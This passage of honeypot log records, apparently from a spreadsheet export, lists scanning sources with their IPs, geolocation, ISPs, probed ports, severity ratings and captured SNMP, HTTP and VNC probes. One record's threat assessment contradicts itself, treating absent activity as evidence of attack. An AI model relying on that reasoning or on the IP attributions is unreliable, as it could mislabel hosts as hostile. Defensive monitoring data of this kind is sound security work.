    <s v="5432&amp;&amp;21&amp;&amp;3306&amp;&amp;21285&amp;&amp;161&amp;&amp;143&amp;&amp;1433&amp;&amp;443&amp;&amp;23&amp;&amp;9100&amp;&amp;445&amp;&amp;6667&amp;&amp;NA&amp;&amp;1521&amp;&amp;80&amp;&amp;1080"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WI"/>
    <s v="Wisconsin"/>
    <s v="Wood"/>
    <s v="Port Edwards"/>
    <s v="5267769"/>
    <s v="54469"/>
    <s v="44.3426"/>
    <s v="-89.8597"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Internet Utilities NA LLC"/>
    <s v="hosting"/>
    <s v="CyberOneData LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;GET"/>
    <s v="{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.0', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '                    '}}&amp;&amp;{Data_SMB:Incoming connection (104.234.115.106,21436)}&amp;&amp;{Data_SMB:Incoming connection (104.234.115.106,33562)}&amp;&amp;{Data_SMB:Incoming connection (104.234.115.106,39888)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:68ea:736a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This suggests an attempted connection to a secure service, but the activity was likely a reconnaissance scan or a probe to identify vulnerabilities, as no actual data transfer occurred. The lack of data transfer indicates it may be a port scan or probing activity. This behavior is indicative of potential malicious exploration. &amp;&amp; The data indicates that there is no SOCKS proxy activity detected, suggesting that an attacker may have attempted to use this proxy method for malicious purposes but was unsuccessful or undetected. This could be a sign of a potential attack attempt via a SOCKS proxy connection. No SOCKS5 proxy activity was observed. &amp;&amp; This log indicates potential malicious activity as an unknown IP attempted to connect using SOCKS5, which is often used for tunneling. This could be an attempt to bypass security measures or hide the true source of the traffic. No further information is available on the IP's intentions. &amp;&amp; No SNMP activity detected, likely an attempted scan or reconnaissance of network services. The absence of SNMP data suggests the attacker is trying to gather information about available services. This could be a precursor to potential exploitation. &amp;&amp; This suggests an unauthorized access attempt using default community string &quot;public&quot; to read system information. The attacker is likely scanning for network topology or system details. This could be a reconnaissance activity by a potential threat actor. &amp;&amp; Malicious activity detected, potential unauthorized access to system configuration information via a public community string. Publicly accessible management interface is being queried for system details. This could be a reconnaissance attempt by an attacker. &amp;&amp; No log data provided."/>
    <s v="Unknown Attack"/>
  </r>
  <r>
    <x v="359"/>
    <x v="359"/>
    <s v="unassigned.172-81-62-89.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:01:10"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T20:01:10"/>
    <n v="413"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H33"/>
    <s v="5900&amp;&amp;53&amp;&amp;65083&amp;&amp;55239&amp;&amp;51913&amp;&amp;52018&amp;&amp;53340&amp;&amp;52790&amp;&amp;50588&amp;&amp;50490&amp;&amp;59977&amp;&amp;50949&amp;&amp;51134&amp;&amp;65216"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3e59"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="360"/>
    <x v="360"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:44:02"/>
    <d v="2025-04-29T19:44:02"/>
    <d v="2025-04-29T19:44:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:1d21"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="361"/>
    <x v="361"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:36:07"/>
    <d v="2025-03-03T04:56:30"/>
    <d v="2025-04-29T19:36:07"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="2006-04-07"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7998:a2d9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="362"/>
    <x v="362"/>
    <s v="NA&amp;&amp;unassigned.142-202-189-39.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T19:28:26"/>
    <d v="2024-11-23T03:43:33"/>
    <d v="2025-04-29T19:28:26"/>
    <n v="398"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H8"/>
    <s v="5900&amp;&amp;64216&amp;&amp;64117&amp;&amp;57947&amp;&amp;57709&amp;&amp;54381&amp;&amp;65329&amp;&amp;50770&amp;&amp;49306&amp;&amp;50375&amp;&amp;49889&amp;&amp;62658&amp;&amp;51002&amp;&amp;64897&amp;&amp;58846&amp;&amp;55011&amp;&amp;51070&amp;&amp;65425&amp;&amp;58877&amp;&amp;56869"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-12-18"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2022-07-15 16:05:05"/>
    <s v="2030-07-15 16:05:05"/>
    <s v="2025-01-12 12:07:03"/>
    <s v="['NS1.DYNU.COM', 'NS2.DYNU.COM', 'NS3.DYNU.COM', 'NS4.DYNU.COM', 'NS5.DYNU.COM', 'NS6.DYNU.COM']"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited']"/>
    <s v="None"/>
    <x v="8"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:8eca:bd27"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="363"/>
    <x v="363"/>
    <s v="NA&amp;&amp;unassigned.142-202-189-62.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T19:27:27"/>
    <d v="2024-11-23T04:04:01"/>
    <d v="2025-04-29T19:27:27"/>
    <n v="463"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H39"/>
    <s v="5900&amp;&amp;57592&amp;&amp;62082&amp;&amp;50909&amp;&amp;65427&amp;&amp;59810&amp;&amp;59639&amp;&amp;53762"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-12-18"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:8eca:bd3e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="364"/>
    <x v="364"/>
    <s v="NA&amp;&amp;unassigned.142-202-189-44.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T19:27:15"/>
    <d v="2024-11-23T03:42:42"/>
    <d v="2025-04-29T19:27:15"/>
    <n v="369"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_MT-CPA_H11"/>
    <s v="5900&amp;&amp;63256&amp;&amp;50983&amp;&amp;50404&amp;&amp;53170&amp;&amp;55661&amp;&amp;59599&amp;&amp;58859&amp;&amp;64897&amp;&amp;58626&amp;&amp;52804&amp;&amp;64178"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-12-18"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8eca:bd2c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="365"/>
    <x v="365"/>
    <s v="NA&amp;&amp;unassigned.142-202-189-12.spryt.net"/>
    <x v="0"/>
    <d v="2025-04-29T19:25:57"/>
    <d v="2024-11-23T03:55:40"/>
    <d v="2025-04-29T19:25:57"/>
    <n v="496"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37"/>
    <s v="5900&amp;&amp;59047&amp;&amp;56387&amp;&amp;52104&amp;&amp;59812&amp;&amp;58244&amp;&amp;64273&amp;&amp;62645&amp;&amp;60959"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-12-18"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2022-07-15 16:05:05"/>
    <s v="2030-07-15 16:05:05"/>
    <s v="2025-01-12 12:07:03"/>
    <s v="['NS1.DYNU.COM', 'NS2.DYNU.COM', 'NS3.DYNU.COM', 'NS4.DYNU.COM', 'NS5.DYNU.COM', 'NS6.DYNU.COM']"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited']"/>
    <s v="None"/>
    <x v="8"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:8eca:bd0c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="366"/>
    <x v="366"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:25:55"/>
    <d v="2025-04-29T19:25:00"/>
    <d v="2025-04-29T19:25:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
